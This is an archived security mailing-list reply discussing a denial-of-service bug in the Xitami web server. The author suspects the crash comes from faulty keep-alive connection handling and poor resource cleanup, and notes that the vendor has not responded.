lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <002c01c23c0e$ccae9f40$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: Re: Clarification on Xitami DoS

>What is vendor's status regarding this issue?

I've e-mailed the vendor, but have received no response *at all*.

>It is good we found the real cause of DoS effect in Xitami.
>Because, the maxedout values seem to work quiet fine, the problem is
>Keep-Alive Connection handling.

Yes, I originally thought it was a connection flood because numbers
started jumping and then Xitami crashed almost immediately.  However,
I was actually seeing the effects of my flood combined with numerous
other connections that had "hung open".

>I don't know how did you actually find out when it has dropped a
>particular connection

Well, I didn't find out when it was dropping connections, just that
it *wasn't* dropping any.  My WinME box btw required an
extremely high number of connections to crash (I believe the number
was over 450), so production machines will require significantly
more connections -- it seems to be a bug-induced resource exhaustion.

>as in the duration of Keep-Alive affected and
>it's connection dropping time and whether it matches the value in
configurations? after how long ?
>I tried netstat -an frequently by making requests from different hosts on
my network, but same results as i told you before.

I'm still a bit hazy on exactly *where* in the keep-alive handling that
Xitami is buggy -- I'm beginning to think that it is not actually related
to an open connection, and instead just a bad resource cleanup on
the server end.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ